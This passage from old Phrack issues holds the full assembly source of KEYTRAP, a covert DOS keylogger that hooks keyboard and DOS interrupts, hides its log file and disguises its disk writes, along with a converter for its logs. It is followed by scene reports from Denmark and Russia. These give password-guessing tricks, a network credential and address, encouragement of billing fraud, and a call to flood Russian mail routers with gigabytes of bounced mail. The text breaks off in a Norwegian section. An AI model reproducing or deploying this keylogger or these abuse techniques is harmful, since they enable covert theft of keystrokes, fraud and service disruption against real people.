~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
logfile: The file that contains the scancodes that Keytrap logged.
outfile: Specify an output file name.
Theres not too much to say here. This program just converts scancodes
from the logfile into their respective keyboard (ASCII) characters.
NOTES
~~~~~
Keytrap will not display ANY messages. Check the logfile and
the size of the logfile if your not sure Keytrap is working.
Keytrap will only make the logfile hidden if the logfile is
actually created by Keytrap or the maximum size of the logfile
is reached or exceeded. If you specify a file that already
exists then Keytrap will not change that files attributes and
will append all scancode data to the end of the file.
Keytrap will not crash if the logfile gets deleted while Keytrap
is in memory. It will just keep looking for the logfile so it can
write its buffer. A buffer write is not forced until the buffer
reaches 400 bytes. It will then try to write its buffer during
the next interrupt 21 call.
-------------------------------------------------------------------------
If you have any questions or need some help, e-mail me.
Below is my public pgp key, don't e-mail me without it !
Dcypher (Dcypher@aol.com)
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6
mQCNAi3iD5cAAAEEAMVJGdgCYzG5av0lLSjO7iXm64qsuk6v/dx5XcMoNmOHNUA3
+tzF0WuVPXuJ59mFxE3/rhQqyh8Mci0f4qT6TR7FfSb8vtzSkF5vW8cNUmQx8Qvf
B/YQZVmztNlWOPROAmT8ZHbsrNev2rgeYjouW3ZOUgA4RKBRYiCTuXD+VOlxAAUR
tBlEY3lwaGVyIDxEY3lwaGVyQGFvbC5jb20+
=w2RN
-----END PGP PUBLIC KEY BLOCK-----
*****************************************************************************
;
;
; KEYTRAP v1.0 - Keyboard Key Logger
; By Dcypher (Dcypher@aol.com)
;
; Usage: KEYTRAP <dir\logfile> /A /B /C
;
; A - Maximum size of log file.
; B - Number of keys to log per session.
; C - Minutes between each session.
;
;------------------------------------------------
;
.286 ; 286 or better
.model small ;
.code ;
org 100h ;
;
begin: jmp install ;
;
;================================================
;
db ' DCYPHER@AOL.COM / KEYTRAP V1.0 ' ; PLEASE DON'T REMOVE
;
buf db 401 dup (0) ; 400 byte buffer
bufptr dw 0 ; +1 for luck :)
;
hide db 0 ; save int21 function call
stimem dw 0 ; grab time when done
handle dw 0 ; logfile handle
control db 0 ; control which INT to use
done_flag db 0 ; session done flag
must_write db 0 ; must-write flag
write_amount dw 0 ; amount written to disk
using_21 db 0 ; already doing an int-21
;
old_9a_off dw 0 ;
old_9a_seg dw 0 ;
;
old_9b_off dw 0 ;
old_9b_seg dw 0 ;
;
old_21_off dw 0 ;
old_21_seg dw 0 ;
;
datasegm dw 0 ; save data-segment
;
delaym dw 0 ; delay, in minutes
mkeys dw 0 ; maximum number of keys
logH dw 0 ; log file size
logL dw 0 ; log file size
;
;==============================================================================
;
int_9A: pushf ;
pusha ;
push es ;
push ds ;
mov ds, datasegm ; we are here
;
cmp control, 1 ; use this one ?
je A91 ;
call pkey ; process key (scancode)
;
A91: pop ds ;
pop es ;
popa ;
popf ;
jmp dword ptr old_9a_off ;
;
;================================================
;
pkey: cmp done_flag, 1 ; completely done ?
je pk2 ;
cmp bufptr, 400 ; buffer limit reached ?
jae pk2 ;
;
in al, 60h ; get scancode
;
cmp al, 39h ; get downstroke and only
ja pk2 ; as far as spacebar
cmp al, 2Ah ;
je pk2 ; no shift
cmp al, 36h ;
je pk2 ; no shift
;
push 0 ;
pop es ;
mov ah, byte ptr es:[417h] ; shift status
test ah, 43h ; test for both shift keys
je pk1 ; and cap-lock active
;
add al, 80h ; show shift or cap-lock
pk1: mov di, bufptr ; in logfile
mov buf[di], al ; place scancode in buffer
inc di ;
mov bufptr, di ;
mov must_write, 1 ; try to write buffer
;
pk2: ret ;
;
;================================================
;
int_9B: pushf ;
pusha ;
push es ;
push ds ;
mov ds, datasegm ; we are here
;
cmp control, 0 ; use this one ?
je B91 ; (not really needed)
call pkey ; process a key (scancode)
;
B91: pop ds ;
pop es ;
popa ;
popf ;
jmp dword ptr old_9b_off ;
;
;==============================================================================
;
int_21: pushf ;
pusha ;
push es ;
push ds ;
mov ds, datasegm ; here we are
;
cmp ax, 0ffffh ; check if already installed
je D21 ;
;
cmp using_21, 1 ; might need to call an
je C21 ; int-21 here so jump if
mov using_21, 1 ; called from below
mov hide, ah ; save function # for hiding
;
call switch ; always control the int 9's
call timer ; always check restart timer
;
cmp done_flag, 1 ; completely done ?
je B21 ;
cmp must_write, 1 ; need to write ?
jne B21 ;
cmp bufptr, 400 ; push a write when buffer
jae A21 ; is full
;
cmp hide, 3Fh ; disk read
je A21 ; (hide buffer write)
cmp hide, 40h ; disk write
je A21 ;
jmp B21 ; can't hide, try another time
;
A21: call saveb ; write buffer
;
B21: mov using_21, 0 ; no int-21 calls anymore
C21: pop ds ;
pop es ;
popa ;
popf ;
jmp dword ptr old_21_off ;
;------------------------------------------------
D21: pop ds ; already installed !
pop es ;
popa ;
popf ;
mov ax, 1 ; show installed
iret ;
;
;==============================================================================
;
timer: cmp done_flag, 0 ; only check time when
je timerb ; session is complete !
;
mov ah, 2Ch ;
int 21h ; what's the time ?
mov al, ch ;
xor ah, ah ;
mov bx, 60 ;
mul bx ; multiply hours by 60
xor ch, ch ;
add ax, cx ; add in the minutes
;
mov bx, stimem ;
cmp ax, bx ; is time now same as
je timerb ; when session was completed
; if so, don't do anything
xor cx, cx ;
timer1: cmp bx, 1440 ; midnight then back to 0
jb timer2 ;
xor bx, bx ;
timer2: inc cx ; minutes counter
inc bx ;
cmp ax, bx ; count until time now
jne timer1 ;
;
cmp cx, delaym ;
jb timerb ; should we reset ?
;
mov done_flag, 0 ; reset / next session
timerb: ret ;
;
;------------------------------------------------
;
switch: mov ax, 3509h ;
int 21h ;
cmp bx, offset int_9A ; everything ok with 9A ?
jne sw1 ; check offset
mov control, 0 ; show who has control
ret ;
;
sw1: cmp control, 1 ; 9B already in use ?
je sw2 ; yes, don't do anything
mov ax, 3509h ;
int 21h ;
mov old_9b_seg, es ;
mov old_9b_off, bx ;
mov ax, 2509h ;
lea dx, int_9B ;
int 21h ; use 9B instead of 9A !
mov control, 1 ; show who has control
sw2: ret ;
;
;------------------------------------------------
;
saveb: mov ax, 3d01h ;
mov dx, 82h ;
int 21h ; open logfile, r/w
jc probw ;
mov handle, ax ;
mov bx, ax ;
mov ax, 4202h ;
xor cx, cx ;
xor dx, dx ;
int 21h ; point to eof
jc probw ;
mov ah, 40h ;
mov bx, handle ;
mov cx, bufptr ;
lea dx, buf ;
int 21h ; write buffer
jc probw ;
mov ah, 3Eh ;
mov bx, handle ;
int 21h ; close logfile
jc probw ;
;------------------------------------------------
mov cx, bufptr ; no problems writing
add write_amount, cx ; so add to written amount
;
mov cx, mkeys ; check number of keys logged
cmp write_amount, cx ; all done ?
jb donew ;
;
mov done_flag, 1 ; show session complete
mov write_amount, 0 ; written amount to 0
call gtime ; grab stop time [minutes]
;
donew: mov must_write, 0 ; no need to write anymore
mov bufptr, 0 ; buffer pointer back to 0
probw: ret ; try again another time
; (if problem writing)
;------------------------------------------------
;
gtime: mov ah, 2Ch ; DONE
int 21h ; grab time in minutes
mov al, ch ;
xor ah, ah ;
mov bx, 60 ;
mul bx ; multiply hours by 60
xor ch, ch ;
add ax, cx ; add in the minutes
mov stimem, ax ; start time in minutes
ret ;
;
;==============================================================================
;==============================================================================
;
install:mov bx, 80h ;
cmp byte ptr [bx], 0 ; any parameters ?
je bye ;
;
mov ax, 0ffffh ;
int 21h ; already installed ?
cmp ax, 1 ;
je bye ;
;
call conv ; convert command line numbers
jc bye ;
call clog ; check or create logfile
;
mov ax, 3509h ;
int 21h ;
mov old_9a_off, bx ; save old int 9
mov old_9a_seg, es ;
mov ah, 25h ;
lea dx, int_9A ;
int 21h ; hook only 9A to start
;
mov ax, 3521h ;
int 21h ;
mov old_21_off, bx ; save old int 21
mov old_21_seg, es ;
mov ah, 25h ;
lea dx, int_21 ;
int 21h ; point to new int 21
;
mov datasegm, ds ; save this data segment area
; for later use in the ISR's
mov bx, offset install ;
mov ax, 3100h ;
mov dx, bx ;
mov cl, 04h ;
shr dx, cl ;
inc dx ;
int 21h ; end / save above install
;
bye: mov ah, 4Ch ; no installation
int 21h ; just end
;
;==============================================================================
;
conv: push ds ; convert command line options
pop es ;
mov di, 81h ;
conv1: inc di ;
cmp byte ptr [di], 2fh ; point to first "/"
jnz conv1 ;
inc di ; point to first number
call mconv ; convert it
jc conv4 ; any problems ?
mov logH, dx ;
mov logL, cx ; save max logfile size
add cx, dx ;
cmp cx, 0 ; make sure not 0
je conv4 ;
;
dec di ;
conv2: inc di ;
cmp byte ptr [di], 2fh ; point to second "/"
jnz conv2 ;
inc di ; point to first number
call mconv ; convert it
jc conv4 ; any problems ?
cmp dx, 0 ; bigger then 65535 ?
ja conv4 ;
mov mkeys, cx ; save key limit
;
dec di ;
conv3: inc di ;
cmp byte ptr [di], 2fh ; point to third "/"
jnz conv3 ;
inc di ; point to first number
call mconv ; convert it
jc conv4 ; any problems ?
cmp dx, 0 ;
ja conv4 ; bigger then 65535 end
cmp cx, 1440 ;
ja conv4 ; bigger then 1440 end
mov delaym, cx ; save session delay time
clc ; show no problems
ret ;
conv4: stc ; show problem
ret ;
;
;------------------------------------------------
;
mconv: xor cx, cx ; main converter
mov dx, cx ; no comments here, all I
mov ah, ch ; know is that it works ! :)
cld ;
dec di ;
convl: inc di ;
mov al, es:[di] ; convert number at es:[di]
xor al, '0' ;
cmp al, 10 ; carry flag will be set
jae convD ; if theres a problem
shl cx, 1 ;
rcl dx, 1 ;
jc convD ;
mov bx, cx ;
mov si, dx ;
shl cx, 1 ;
rcl dx, 1 ;
jc convD ;
shl cx, 1 ;
rcl dx, 1 ;
jc convD ;
add cx, bx ;
adc dx, si ;
jc convD ;
add cl, al ;
adc ch, 0 ;
adc dx, 0 ;
jc convD ;
jmp convl ;
convD: ret ;
;
;------------------------------------------------
;
clog: mov bx, 82h ; point to logfile
null1: cmp byte ptr [bx], 20h ; find first space
je null2 ;
inc bx ;
jmp null1 ;
null2: mov byte ptr [bx], 0 ; replace space with 0
;
mov ax, 3D01h ;
mov dx, 82h ;
int 21h ; open the file
jc clog3 ;
mov handle, ax ; good open, save handle
;
mov ax, 4202h ;
mov bx, handle ;
xor cx, cx ;
xor dx, dx ;
int 21h ; mov pointer to eof
;
cmp logH, dx ; check size
ja clog4 ; size ok
cmp logH, dx ;
je clog1 ;
jmp clog2 ; must be below, not ok
clog1: cmp logL, ax ;
ja clog4 ; size ok
;
clog2: mov ax, 4301h ;
mov dx, 82h ;
xor cx, cx ;
int 21h ; change file mode
mov ah, 41h ;
mov dx, 82h ;
int 21h ; delete file
;
clog3: mov ah, 3Ch ; create new
mov cx, 02h ; (hidden)
mov dx, 82h ;
int 21h ;
mov handle, ax ;
;
clog4: mov bx, handle ; close logfile handle
mov ah, 3Eh ;
int 21h ;
ret ;
;
;==============================================================================
end begin
*****************************************************************************
;
;
; CONVERT v1.0 - Keytrap logfile converter
; By Dcypher@aol.com
;
; Usage: CONVERT logfile outfile
;
; logfile - Keytrap's scancode data (logfile)
; outfile - Specify an output file name
;
;
;----------------------------------------
;
.286 ;
.model small ;
.code ;
org 100h ;
;
start: jmp go ;
;
;----------------------------------------
;
inhandle dw 0 ;
inpointH dw 0 ;
inpointL dw 0 ;
loaded dw 0 ;
last db 0 ;
;
outhandle dw 0 ;
outoffset dw 0 ;
;
;----------------------------------------
;
table db 002h, '1' ; scan-code table
db 003h, '2' ;
db 004h, '3' ;
db 005h, '4' ;
db 006h, '5' ;
db 007h, '6' ;
db 008h, '7' ;
db 009h, '8' ;
db 00Ah, '9' ;
db 00Bh, '0' ;
; ;
db 082h, '!' ;
db 083h, '@' ;
db 084h, '#' ;
db 085h, '$' ;
db 086h, '%' ;
db 087h, '^' ;
db 088h, '&' ;
db 089h, '*' ;
db 08Ah, '(' ;
db 08Bh, ')' ;
;----------------------------------------
db 01Eh, 'a' ;
db 030h, 'b' ;
db 02Eh, 'c' ;
db 020h, 'd' ;
db 012h, 'e' ;
db 021h, 'f' ;
db 022h, 'g' ;
db 023h, 'h' ;
db 017h, 'i' ;
db 024h, 'j' ;
db 025h, 'k' ;
db 026h, 'l' ;
db 032h, 'm' ;
db 031h, 'n' ;
db 018h, 'o' ;
db 019h, 'p' ;
db 010h, 'q' ;
db 013h, 'r' ;
db 01Fh, 's' ;
db 014h, 't' ;
db 016h, 'u' ;
db 02Fh, 'v' ;
db 011h, 'w' ;
db 02Dh, 'x' ;
db 015h, 'y' ;
db 02Ch, 'z' ;
; ;
db 09Eh, 'A' ;
db 0B0h, 'B' ;
db 0AEh, 'C' ;
db 0A0h, 'D' ;
db 092h, 'E' ;
db 0A1h, 'F' ;
db 0A2h, 'G' ;
db 0A3h, 'H' ;
db 097h, 'I' ;
db 0A4h, 'J' ;
db 0A5h, 'K' ;
db 0A6h, 'L' ;
db 0B2h, 'M' ;
db 0B1h, 'N' ;
db 098h, 'O' ;
db 099h, 'P' ;
db 090h, 'Q' ;
db 093h, 'R' ;
db 09Fh, 'S' ;
db 094h, 'T' ;
db 096h, 'U' ;
db 0AFh, 'V' ;
db 091h, 'W' ;
db 0ADh, 'X' ;
db 095h, 'Y' ;
db 0ACh, 'Z' ;
;----------------------------------------
db 00Ch, '-' ;
db 08Ch, '_' ;
;
db 00Dh, '=' ;
db 08Dh, '+' ;
;
db 01Ah, '[' ;
db 09Ah, '{' ;
;
db 01Bh, ']' ;
db 09Bh, '}' ;
;
db 027h, ';' ;
db 0A7h, ':' ;
;
db 028h, 027h ; '
db 0A8h, '"' ;
;
db 033h, ',' ;
db 0B3h, '<' ;
;
db 034h, '.' ;
db 0B4h, '>' ;
;
db 035h, '/' ;
db 0B5h, '?' ;
;
db 02Bh, '\' ;
db 0ABh, '|' ;
;
db 037h, '*' ;
db 0B7h, '*' ;
;
db 029h, '`' ;
db 0A9h, '~' ;
;
;----------------------------------------
;
db 039h, 020h ; space
db 0B9h, 020h ; space with shift
;
db 00Eh, 011h ; backspace
db 08Eh, 011h ; backspace with shift
;
db 01Ch, 00Ah ; return
db 09Ch, 00Ah ; return with shift
;
db 0 ; End of Table
;
;==============================================================================
;
fprob: mov ah, 9 ;
lea dx, ferr ;
int 21h ;
jmp bye ;
;
prtuse: mov ah, 9 ;
lea dx, usage ;
int 21h ;
;
bye: mov ah, 4Ch ;
int 21h ;
;
;------------------------------------------------
;
go: mov ah, 9 ;
lea dx, namver ;
int 21h ;
;
mov bx, 80h ;
cmp byte ptr [bx], 0 ;
je prtuse ;
;
call null ;
call check ;
jc fprob ;
;
go1: call ldata ;
call conv ;
call sdata ;
cmp last, 1 ;
jne go1 ;
jmp bye ;
;
;------------------------------------------------
;
null: mov bx, 81h ;
null1: inc bx ;
cmp byte ptr [bx], 20h ;
jnz null1 ;
mov byte ptr [bx], 0 ;
;
mov outoffset, bx ;
inc word ptr [outoffset] ;
;
null2: inc bx ;
cmp byte ptr [bx], 0Dh ;
jnz null2 ;
mov byte ptr [bx], 0 ;
ret ;
;
;------------------------------------------------
;
check: mov ax, 3D00h ;
mov dx, 82h ;
int 21h ;
jc check2 ;
mov bx, ax ;
mov ah, 3Eh ;
int 21h ;
jc check2 ;
;
mov ah, 3Ch ;
xor cx, cx ;
mov dx, outoffset ;
int 21h ;
jc check2 ;
mov bx, ax ;
mov ah, 3Eh ;
int 21h ;
jc check2 ;
;
clc ;
check2: ret ;
;
;------------------------------------------------
;
ldata: mov ax, 3D00h ;
mov dx, 82h ;
int 21h ;
mov inhandle, ax ;
;
mov ax, 4200h ;
mov bx, inhandle ;
mov cx, inpointH ;
mov dx, inpointL ;
int 21h ;
;
mov ah, 3Fh ;
mov bx, inhandle ;
mov cx, 60000 ;
lea dx, eof ;
int 21h ;
mov loaded, ax ;
cmp ax, 60000 ;
je ldata2 ;
mov last, 1 ;
;
ldata2: mov ax, 4201h ;
mov bx, inhandle ;
xor cx, cx ;
xor dx, dx ;
int 21h ;
mov inpointH, dx ;
mov inpointL, ax ;
;
mov ah, 3Eh ;
mov bx, inhandle ;
int 21h ;
ret ;
;
;------------------------------------------------
;
conv: mov cx, loaded ;
lea si, eof ;
;
conv1: lea di, table ;
;
cmp cx, 0 ;
je conv6 ;
;
mov al, byte ptr [si] ;
conv2: mov ah, byte ptr [di] ;
cmp ah, 0 ;
je conv4 ;
cmp ah, al ;
je conv3 ;
add di, 2 ;
jmp conv2 ;
;
conv3: inc di ;
mov al, byte ptr [di] ;
mov byte ptr [si], al ;
dec cx ;
inc si ;
jmp conv1 ;
;
conv4: mov byte ptr [si], 20h ;
dec cx ;
inc si ;
jmp conv1 ;
;
conv6: ret ;
;
;------------------------------------------------
;
sdata: mov ax, 3D02h ;
mov dx, outoffset ;
int 21h ;
mov outhandle, ax ;
;
mov ax, 4202h ;
mov bx, outhandle ;
xor cx, cx ;
xor dx, dx ;
int 21h ;
;
mov ah, 40h ;
mov bx, outhandle ;
mov cx, loaded ;
lea dx, eof ;
int 21h ;
;
mov ah, 3Eh ;
mov bx, outhandle ;
int 21h ;
ret ;
;
;------------------------------------------------------------------------------
namver db 10,13
db 'CONVERT v1.0',10,13
db 'Keytrap logfile converter.',10,13
db 'By Dcypher (Dcypher@aol.com)',10,13
db 10,13,'$'
usage db 'Usage: CONVERT logfile outfile',10,13
db 10,13
db ' logfile - Keytrap',27h,'s scancode data.',10,13
db ' outfile - Specify an output file name.',10,13
db 10,13,'$'
ferr db 'WARNING: Problem with one of the files.',10,13
db 10,13,'$'
;------------------------------------------------------------------------------
eof db 0
end start ==Phrack Magazine==
Volume Five, Issue Forty-Six, File 27 of 28
****************************************************************************
International Scenes
There was once a time when hackers were basically isolated. It was
almost unheard of to run into hackers from countries other than the
United States. Then in the mid 1980's thanks largely to the
existence of chat systems accessible through X.25 networks like
Altger, tchh and QSD, hackers world-wide began to run into each other.
They began to talk, trade information, and learn from each other.
Separate and diverse subcultures began to merge into one collective
scene and has brought us the hacking subculture we know today. A
subculture that knows no borders, one whose denizens share the common goal
of liberating information from its corporate shackles.
With the incredible proliferation of the Internet around the globe, this
group is growing by leaps and bounds. With this in mind, we want to help
further unite the communities in various countries by shedding light
onto the hacking scenes that exist there. If you want to contribute a
file about the hacking scene in your country, please send it to us
at phrack@well.com.
This month we have files about the scenes in Denmark and Russia, updates
from Australia and Argentina, and a scan of Norway's toll-free exchange.
________________________________________________________________________________
The Computer Underground in Denmark
Dear Phrack Readers, what follows is a little about the Danish
computer underground, focusing on the hacking/phreaking scene.
A little introduction:
Even though Denmark itself is little country, with a little over 5 million
citizens, an active computer underground community thrives upon the growing
network links and computer systems which in these days seems to pop up all
over country.
The history of the hacking community in DK is not very old, but since the
first Danish hackers appeared some 5 years ago, there has been increasing
hacking activity, bringing on a history of busts, paranoia and times of war;
but also a history of great friendships, supremacy over the corporate machine,
and a process of learning more about the world we live in. But before we take
a look at the networks, boards and the community itself, let's go back in time,
and find the place where it all started.
The Past:
The first hackers to appear in DK was JubJub Bird and Sprocket, two high
school students which broke into 100's of computers world wide. At that time
there was no H/P scene in DK, no boards, no HP networks and no fellow hackers.
Nevertheless, JubJub's role in the Danish HP history plays a key role. JubJub
got busted early January '90, after being discovered in some of NASA's non
public machinery, and being under surveillance for a period of time. This was
the beginning of what was to become the Danish hacking scene. JubJub and
Sprocket never got a sentence, since the court had absolutely no idea of how
to handle a case like this. The court sat down a period of 2 years, and if
JubJub or Sprocket was caught in hacking within that period they would
get a verdict.
Anyway, after the bust of JubJub and Sprocket, the first stirs of hackers
appeared and began to expand like rings in water. And suddenly we had a growing
happy hacking community. Hackers from all over the country gathered at newly
started 'HPA only boards' which was a rarely seen thing among the sea of WaReZ
boards. One of the coolest boards was Fantasia, the headquarters of MoTIGoL,
which was being run by Netrunner. Fantasia was the largest in Denmark, maybe
even in Scandinavia, and had callers from all over the world. At that time,
nobody was afraid of getting busted, and A LOT of BlueBoxing, X25, and general
hacking on Inet was done. But one day all that changed.
During the winter '91 DIKU (Institute of computer science, Copenhagen
university) was used as a meeting place of hackers. A lot of novice hackers
used the machines to learn about Internet and UNIX in general, skating through
the internet, trading info, chatting at IRC and stuff like that. What nobody
knew was that Jgen Bo Madsen, security expert and high paid consultant
working for UNI*C, was monitoring all traffic from and off DIKU, with evil
intentions of busting! The law enforcement specter was soon to cast its dark
shadow on the whole of the Danish scene.
It all ended one winter afternoon. I remember turning on the TV, not really
paying attention to the news, reading a book or so, when suddenly the news
lady starts speaking about how the secret service is soon to unravel the biggest
hacker conspiracy ever in Denmark, one hacker was already arrested and 10 more
would be arrested in near future. Saron was the one who got busted. He had used
an x25 datapak link, which normally only was used for electronic mail, to
access DIKU, coming in from a German PAD to make tracing harder, but also
making a hell of a big bill for the stolen NUI's owner. Anyway, it came out
that JBM (Jgen Bo Madsen) had traced 76 calls to DIKU, and had monitored the
breakins of computers in Greece, Brazil, Mexico and USA.
At that moment the entire scene more or less panicked. Most dudes moved
their precious machinery out of the house and all boards closed down.
A period of isolation began. The SysOp of Fantasia, Netrunner pulled out his
harddisk hiding it somewhere out of reach, if JBM and his secret service
buddies should show up.
No more busts happened and people calmed down after a month or so. Everybody
knew that things wouldn't be the same after the DIKU incident. Netrunners
harddisk broke down after he had reinstalled it, because all the dirt it
had consumed from 2 years constant running, was too much for the thing to
handle when it was powered back on. So, Fantasia closed and the underground
network PhoenixNet also closed when it came out that JBM had infiltrated
the net. An era was over, and a new was to begin.
The Present:
Today's scene is doing quite good. It has became harder in a way, more
careful and more closed than ever. But still, we have open boards
and a public network. FOOnet which focuses on computer security and is
used as an forum open for discussions. Mostly by hackers and people into
computer security in general, but every once in awhile JBM and Sysadm's
drop by too. Also, the Danish scene is proud to release CrackerJack, made by
Jackal, which we still claim is the fastest UNIX passwd cracker available for
PC. Not that cracking passwd files is a major element in hacking, but its nice
to have a fast cracker every once in awhile :)
The Danish computer underground scene is filled with WaReZ boards,
but only a few real H/P/A boards are running. Boards like Free Speech Inc.
and Freeside are places where the Danish hackers hang out. None of these
boards are public, but JBM is quite aware of them and had once infiltrated
Freeside, even though it was clearly stated that the bbs was private and
no one related to any gov agencies was allowed to use the board. So, JBM
is actually doing what he has accused us for over the years, which is
intruding people's privacy.
Other than FOOnet, there is a few other networks, such as SDC which
once had a good mail flow in the hacking conferences, but today more
is turning into a demo/warez net. A few other truly H/P nets are running
successful with a good mail flow, but those shall remain anonymous in
this article.
The links from the Danish scene to fellow hackers around the world is
very good. Due to numerous nights spent at QSD, connections is established
to a lot of dudes in Brazil which frequently drops by Free Speech Inc. and
Freeside, dudes in UK as well as fellow hackers in US like Alby/Empire.
Okay, this is it. The section about hacking in Denmark. The stuff
that you had to read all the above boring shitty sentimental stuff,
to get to!!
Hacking in Denmark:
The two main networks in DK which is used for hacking and meeting fellow
hackers are, (of course) Internet and the X25 datapak link. Internet is
accessible via all Universities like diku.dk, daimi.aau.dk, auc.dk and so on.
(Nobody uses DIKU anymore though). The university is doing a brave struggle
to keep the hackers out by upgrading to C2 passwd security, meaning that
passwds must be at least 8 chars, contain 1 uppercase and 1 non alphabetic
char.
The upper level of the top 10 of chosen C2 security passwd's goes something
like: q1w2e3r4*, a1s2d3f4*, these do not contain any uppercase chars and
therefore should not have been accepted as a passwd by the system, but
apparently the C2 software finds them secure. Also, a nice thing to do is
taking your wordlist and using Therion's Passwd Utility, TPU which is a word
list manipulator, and add a 1* to all words in the list and uppercase the first
letter. Gives a lot of accounts.
Another popular thing, in order to keep hackers out, is to setup a so-called
'modem security password' on all dialups. So when you call up the system,
before you ever get to the server you have to enter a password. And if you get
through, not all accounts are cleared to use the modem dialup facilities,
and unless you've got your sleazy hands on a cleared account, you get the boot.
Even though the universities puts such a great effort into keeping
hackers out, they aren't doing very good. In fact, they are doing real
bad. A legit account costs appr. 1900 dkr, which is about a little over
300$ US., which goes into the pockets of UNI*C, so its no wonder that
we like to use the nice free facilities present at the universities.
Other ways to get on Internet, are via other machines under the ministry
of education and certain private and government systems. It's surprising
how many bugs (that we all know of) in certain UNIX versions, that still
have not been patched, and therefore leave the systems wide open.
This goes not only for Denmark, but generally throughout machines on Internet
in Europe. Also, a well known phenomena in DK throughout the sector of
private corporation computer systems, is lousy security. Elementary
stuff like bad file permissions, left over suid shell scripts, and
open guest accounts are everywhere.
Regarding the X25 datapak links. The official Danish PAD can be
reached at dialup 171. This is totally free number just like 80xxxxxx
are, which doesn't affect your phone bill. Keep in mind that all calls made in
DK are billed, even local calls within same city are charged, and charged
high! I remember a time when I was kind of addicted to a certain MUD. For one
month alone I got a bill on 1800 dkr, appr. 300 US$! So, the 171 X25 link is
nice thing, since all calls are billed to the owner of the Network User Id
(NUI) and NOT on your phone bill.
However, X25 can be a dangerous thing to use. Especially if you only
have a single NUI to use. The phone company is having some trouble tracing
the 171, but all calls made in DK on digital lines are logged. So, when
some corporation gets a bill on, say 2-3000$ or an amount much higher
than usual, the phone company can compare the logs on who dialed 171,
to the X25 logs, on which date and time the NUI in question was abused,
and figure out who abused the NUI. On analog lines the logging is
harder to do, and only goes back a month or so. The format of the NUIs
consist of a user number and a password. The first char indicates
either a K or J, depending on the NUI's owner, either located under KTAS
or JTAS districts. Jutland is covered by JTAS and Copenhagen Sjlland,
by KTAS. Then follows 7 or 8 numbers and usually a word of 7-8 chars. Like,
K0100872DKDIANEC, this is a valid NUI open for public use by everybody,
but its restricted to only to connect to a specific system. Sum lame
menu database thing. Most NUI's allows access to most computers, world
wide on the X25 network, by an NUA (network User Address). The most use
of X25 is to gain free access to Internet by connecting to a PAD which
allows telnet. Most of the telnet PAD's has been closed recently because
of an increasing (ab)use. However, there is still sites like isosun-t.
ariadne.gr which carries an X25 PAD, and because the sysadm there comes off
like a dick and is a jerk I'll give u all his NUA. Its 020233181282010. Also,
check out gw.sdbs.dk, carries a 9k6 x25 link as well as normal Inet axx.
A few people to mention, who either has or is playing an important
part of the Danish hacking community:
JubJub Bird, Sprocket, Saron, Ravan, Netrunner / Sense/NET, Descore, WedLock,
Le Cerveau, Parrot-Ice, Jackal, Temp, Therion, and myself I guess... :)
If u like, check out:
Free Speech Inc. (+45) 4 582 5565 SysOp: NiteCrawler
Freeside (+45) 3 122 3119 -"- : Descore (Off. CJ Dist. site.)
This is it. Hope u enjoyed this little file. We are always happy to
meet foreign hackers, so call one of the above boards and lets exchange
accou.. ehh... intercultural hacking research information :)
-----------------------------------------------------------------------------
Why would you or why wouldn't you want
to hack in the ex-USSR or in other words
what the hell do we do up here.
By Digital Empiror and Stupid Fucker
Russia is a great country, with absolutely no laws against hacking or
phreaking, both are very easy to do and get away with. It's for that
reason, that most of the famous online services like CompuServe and Delphi
closed registrations coming out of the biggest country in the world via
SprintNet, (you guys think we still can't get in? ... take that as a hint).
If some great telephone company installed a payphone that can charge calls
onto a credit card (very rare in this country) then we can use it as well,
credit card numbers are not hard to compile, especially if you know that
it is not really illegal. What about those great cellular telephones, you
know, we love to use those for free, (can't you guys get it? we know that
we are pain in the ass, but LIVE WITH IT!).
Most of our switchboards in Russia are very ancient, screwed up
relay-analog switches, they don't have methods for protocol-ing
telephone calls and present undependable methods for identifying telephone
numbers. Also there is special equipment which allows making it impossible
to detect your phone number, or even making detection equipment mistake your
phone number. Interstate switchboards have to have special methods of
detecting your phone number, which are of course only accessible to
Interstate switchboards and not to the rest of commercial companies. There
was a case once were SprintNet caught one of our great hackers, but he had
sent them to his great grandfather's (wanna try doing that with the
FBI?) because as he said 'You can't really be sure that it was really ME
calling since in this country you can't rely on your number detection
equipment...'
Another great thing is how the networks are set up in Russia. The greatest
and the biggest X.25 network is of course SprintNet (for which they have to
pay of course, if not them then somebody else...), it's a little slow here,
but that's OK. The administrators who set up the PADs are very lame and
stupid, and of course can't set up their PADs like SprintNet would want
them to. They can, for example, they were setting up their PAD so, that it
would let you connect with virtually ANY system without asking for a NUI,
and even when they detected, that hackers do it, they couldn't do anything
besides changing their PAD instead of just changing one register!
Besides that, their is no problem with finding a NUI for Russian X.25
networks, most of them don't support collect calls like SprintNet, so most
Russian services that would like their customers to access their service
via X.25 give the users a unique NUI, that specifies that they can only
access THIS service, but they usually forget to set it up right so the
stupid customers like another of our great hackers, will instead of getting
charged for the service, go to an outdial and call his favorite BBS in
Clearwater, FL for an example (do they have boards there?). I don't know
if you like to access CitiBank machines from SprintNet, but we love to do
stuff like that. For example, recently we found a lone standing computer,
I don't think the guys in CitiBank really understood what they were doing
when they left their modem setup option on that machine without a password,
it was a pleasure to change their modem strings knowing that it's absolutely
legal to do so and nobody has even a right to call about it! Also there
are Internet providers in Russia, only two, from which only one is
interesting - RELCOM! Most of Internet in Russia is done via UUCP and
costs a bundle of money, so if I am in a bad mood, I'll drop 10-20 megs of
mail into an address that doesn't exist, and will laugh and you know why?
In RELCOM, everybody pays the central router - KIAE.SU, so if you send megs
of stuff, it will go through a lot of systems that will have to pay first
each other then to KIAE.SU, but there will be THE last system, that will
say 'ya know? there is no such address!', so then the trouble will start.
So if you are in a bad mood, then please, do us a favor, drop a gig or 2 to
machine that does not have an IP address, better for it to go via a few of
those machines, for example, to be original:
kaija.spb.su!arcom.spb.su!<any machine in USA>!kiae.su!kaija.spb.su!root
I am sure if you have NSLOOKUP, you can be original and make your best
route via a dozen systems. When doing it, you can be sure, that it will
call a lot of arguments from every one of that dozen concerning to who will
pay for that gig (1mb of mail in Russia costs $50 - $150, that enough money
for poor Russian Internet hosts).
It's all really great, but we are all on our own, and are not organized into a
group. There are not many of us and we are not known by any of our western
colleagues, to contact us, mail us at:
an58736@anon.penet.fi
-----------------------------------------------------------------------------
PhreeFone Numbers in Norway
Research and Norwegian Edition by
cyber aktiF (01-Feb-94)
English Translation by Codex/DBA (26-Apr-1994)
-----------------------------------------------------------------------------
DISCLAIMER: The author of this document takes no responsibility as to how
the information herein is used. I hope everyone who uses this
information use it for inquisitive purposes only, and don't
